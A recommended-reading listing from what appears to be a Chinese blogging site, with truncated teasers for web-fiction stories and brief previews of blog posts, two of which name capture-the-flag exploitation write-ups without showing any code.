  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,460评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,502评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,511评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,280评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,736评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,014评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,190评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,848评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,531评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,159评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,411评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,067评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,078评论 2 352

推荐阅读更多精彩内容

  • 过段时间没有输入则会显示Alarm clock,与sub_B70有关(调用alarm,nop掉)。 共有5个选项。...
    静析机言阅读 1,326评论 0 1
  • 网鼎杯第一场wp guess防护机制:image.png 开启了canary和NX 简单的看了下反编译的逻辑 发现...
    zs0zrc阅读 1,983评论 0 4
  • 爱情从来没有像今天这样 来得快去得更快 男人和女人 隔着屏幕说爱你 隔着屏幕说再见 昨天还是陌生人 今天就已是前任...
    写手墨菲阅读 238评论 0 0
  • 写点东西是我有生以来的愿望,我为此也并不是没有做出过尝试,毕竟打开简书之后我发现自己有三篇私密的文章。 这三篇文章...
    愚神礼赞阅读 365评论 1 2
  • 大家好,我叫笑笑,听到这个名字,大家应该首先感觉我是个爱笑的人吧,是的,我喜欢笑,在婴孩期我就爱笑,只要有人...
    笑笑_a436阅读 618评论 0 0